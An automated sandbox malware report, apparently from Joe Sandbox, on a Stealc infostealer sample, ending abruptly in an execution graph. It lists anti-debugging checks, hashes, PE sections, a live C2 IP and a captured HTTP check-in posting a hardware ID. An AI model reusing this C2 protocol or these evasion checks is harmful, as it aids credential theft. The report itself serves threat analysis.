                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_000845C0 VirtualProtect ?,00000004,00000100,00000000 4_2_000845C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00099860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_00099860
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00099750 mov eax, dword ptr fs:[00000030h] 4_2_00099750
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00097850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 4_2_00097850
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 6488, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00099600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 4_2_00099600
                Source: file.exe, file.exe, 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: 8Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 4_2_00097B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00096920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 4_2_00096920
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00097850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 4_2_00097850
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00097A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 4_2_00097A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 4.2.file.exe.80000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.1298921959.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6488, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 4.2.file.exe.80000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.1298921959.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6488, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK Matrix (a number in parentheses is the count of matched signatures for that technique):

                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | Native API (11) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                | Source | Detection | Scanner | Label | Link |
                |---|---|---|---|---|
                | file.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
                | file.exe | 100% | Joe Sandbox ML | | |

                No Antivirus matches
                No Antivirus matches
                No Antivirus matches

                | Source | Detection | Scanner | Label | Link |
                |---|---|---|---|---|
                | http://185.215.113.37/ | 100% | URL Reputation | malware | |
                | http://185.215.113.37 | 100% | URL Reputation | malware | |
                | http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware | |
                | http://185.215.113.37/ws | 100% | URL Reputation | malware | |

                No contacted domains info

                | Name | Malicious | Antivirus Detection | Reputation |
                |---|---|---|---|
                | http://185.215.113.37/ | true | URL Reputation: malware | unknown |
                | http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown |

                | Name | Source | Malicious | Antivirus Detection | Reputation |
                |---|---|---|---|---|
                | http://185.215.113.37/e2b1563c6670f193.php1G | file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | true | | unknown |
                | http://185.215.113.37 | file.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown |
                | http://185.215.113.37/e2b1563c6670f193.phpUG | file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | true | | unknown |
                | http://185.215.113.37/h | file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | true | | unknown |
                | http://185.215.113.37/e2b1563c6670f193.php4 | file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | true | | unknown |
                | http://185.215.113.37/e2b1563c6670f193.phpyGD | file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | true | | unknown |
                | http://185.215.113.37/ws | file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown |
                | http://185.215.113.37/e2b1563c6670f193.php)G | file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | true | | unknown |
                | http://185.215.113.37t | file.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown |
                | IP | Domain | Country | ASN | ASN Name | Malicious |
                |---|---|---|---|---|---|
                | 185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true |
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1540473
                Start date and time: 2024-10-23 20:03:09 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 5m 11s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed: 16
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: file.exe
                Detection: MAL
                Classification: mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 87
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes were analyzed; the report is missing behavior information
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: file.exe
                              No simulations
                | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                |---|---|---|---|---|
                | 185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php |
                | | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php |
                | | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php |
                | | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php |
                | | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php |
                | | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php |
                | | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php |
                | | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php |
                | | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php |
                | | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php |
                              No context
                | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                |---|---|---|---|---|
                | WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37 |
                | | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16 |
                | | file.exe | malicious | Stealc, Vidar | 185.215.113.37 |
                | | file.exe | malicious | Stealc | 185.215.113.37 |
                | | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16 |
                | | file.exe | malicious | Stealc, Vidar | 185.215.113.37 |
                | | file.exe | malicious | Stealc | 185.215.113.37 |
                | | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16 |
                | | file.exe | malicious | Stealc, Vidar | 185.215.113.37 |
                | | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16 |
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.947877291970593
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'827'840 bytes
                              MD5:1d63962fa977f6d304646bb056c59d16
                              SHA1:7a7b2a8425fa3e601de7f51c6e3377b7f641d3e9
                              SHA256:b6f0f7c28a9b15f590c9a327464d2d562603fcbf246f03399cdc1234007d85e7
                              SHA512:e89908e46a5eaeac65f2f4bc2198c8b52e47b801c7b2e7bb7de095cdf9733bd6c122154843596144f4ccfd9ebebdd69e75954b54d462e674ad99d5c6a7feabef
                              SSDEEP:24576:7uAUIpw9Hx8nHFBOqnsJ9wu4hkcTHK8IwMUvTqAVmBQKm6THFp6KCKVEQu2Z+h:7u0qsHfmcJ51+wqQ+p6KCKOQut
                              TLSH:BA853336985CD465D88C74F84B8DDFD97320861EE4E746E7B8A437E7BC9CBD221A6040
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xa8f000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007FA49D148D8Ah
                              cmpps xmm3, dqword ptr [ebx], 00h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007FA49D14AD85h
                              add byte ptr [esi], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dl
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [esi], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edi], bl
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], ah
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edi], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], ch
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add dword ptr [edx], ecx
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or byte ptr [eax+00000000h], al
                              add byte ptr [eax], al
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | a49ab84df369f80e9b8cbd4f26870660 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x297000 | 0x200 | 15af610fbb49c674e31e4e72a00ed520 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zdqimryq | 0x4f5000 | 0x199000 | 0x198200 | 5fc328435ce3709dfd3491fbc71e374c | False | 0.9947830924578867 | COM executable for DOS | 7.953415844862702 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
aqqapoae | 0x68e000 | 0x1000 | 0x400 | 803c40019de324e235a12319af4caf5c | False | 0.73828125 | data | 5.887789425043598 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x68f000 | 0x3000 | 0x2200 | 334c89854b05eb3090f9b53bb787e09c | False | 0.05618106617647059 | DOS executable (COM) | 0.6786191517818762 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-23T20:04:11.651073+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49700 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2024 20:04:10.434242010 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
Oct 23, 2024 20:04:10.439776897 CEST | 80 | 49700 | 185.215.113.37 | 192.168.2.7
Oct 23, 2024 20:04:10.441736937 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
Oct 23, 2024 20:04:10.462238073 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
Oct 23, 2024 20:04:10.468069077 CEST | 80 | 49700 | 185.215.113.37 | 192.168.2.7
Oct 23, 2024 20:04:11.357002974 CEST | 80 | 49700 | 185.215.113.37 | 192.168.2.7
Oct 23, 2024 20:04:11.357121944 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
Oct 23, 2024 20:04:11.360687971 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
Oct 23, 2024 20:04:11.366863966 CEST | 80 | 49700 | 185.215.113.37 | 192.168.2.7
Oct 23, 2024 20:04:11.651000023 CEST | 80 | 49700 | 185.215.113.37 | 192.168.2.7
Oct 23, 2024 20:04:11.651072979 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
Oct 23, 2024 20:04:14.584424019 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
• 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 185.215.113.37 | 80 | 6488 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 20:04:10.462238073 CEST | 89 | OUT | GET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache
Oct 23, 2024 20:04:11.357002974 CEST | 203 | IN | HTTP/1.1 200 OK
                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
Oct 23, 2024 20:04:11.360687971 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFB
                              Host: 185.215.113.37
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 30 44 44 30 33 36 34 35 42 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a
                              Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="hwid"30DD03645BFB4109353171------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="build"doma------GDHIDHIEGIIIECAKEBFB--
Oct 23, 2024 20:04:11.651000023 CEST | 210 | IN | HTTP/1.1 200 OK
                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=



                              Target ID:4
                              Start time:14:04:05
                              Start date:23/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x80000
                              File size:1'827'840 bytes
                              MD5 hash:1D63962FA977F6D304646BB056C59D16
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000004.00000003.1298921959.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:8.7%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:9.7%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:24
                                execution_graph 13079 969f0 13124 82260 13079->13124 13103 96a64 13104 9a9b0 4 API calls 13103->13104 13105 96a6b 13104->13105 13106 9a9b0 4 API calls 13105->13106 13107 96a72 13106->13107 13108 9a9b0 4 API calls 13107->13108 13109 96a79 13108->13109 13110 9a9b0 4 API calls 13109->13110 13111 96a80 13110->13111 13276 9a8a0 13111->13276 13113 96b0c 13280 96920 GetSystemTime 13113->13280 13114 96a89 13114->13113 13116 96ac2 OpenEventA 13114->13116 13118 96ad9 13116->13118 13119 96af5 CloseHandle Sleep 13116->13119 13123 96ae1 CreateEventA 13118->13123 13121 96b0a 13119->13121 13121->13114 13123->13113 13477 845c0 13124->13477 13126 82274 13127 845c0 2 API calls 13126->13127 13128 8228d 13127->13128 13129 845c0 2 API calls 13128->13129 13130 822a6 13129->13130 13131 845c0 2 API calls 13130->13131 13132 822bf 13131->13132 13133 845c0 2 API calls 13132->13133 13134 822d8 13133->13134 13135 845c0 2 API calls 13134->13135 13136 822f1 13135->13136 13137 845c0 2 API calls 13136->13137 13138 8230a 13137->13138 13139 845c0 2 API calls 13138->13139 13140 82323 13139->13140 13141 845c0 2 API calls 13140->13141 13142 8233c 13141->13142 13143 845c0 2 API calls 13142->13143 13144 82355 13143->13144 13145 845c0 2 API calls 13144->13145 13146 8236e 13145->13146 13147 845c0 2 API calls 13146->13147 13148 82387 13147->13148 13149 845c0 2 API calls 13148->13149 13150 823a0 13149->13150 13151 845c0 2 API calls 13150->13151 13152 823b9 13151->13152 13153 845c0 2 API calls 13152->13153 13154 823d2 13153->13154 13155 845c0 2 API calls 13154->13155 13156 823eb 13155->13156 13157 845c0 2 API calls 13156->13157 13158 82404 13157->13158 13159 845c0 2 API calls 13158->13159 13160 8241d 13159->13160 13161 845c0 2 API calls 13160->13161 13162 82436 13161->13162 13163 845c0 2 API calls 13162->13163 13164 8244f 13163->13164 13165 845c0 2 API calls 13164->13165 13166 82468 13165->13166 13167 845c0 2 API calls 13166->13167 13168 82481 13167->13168 13169 845c0 2 API 
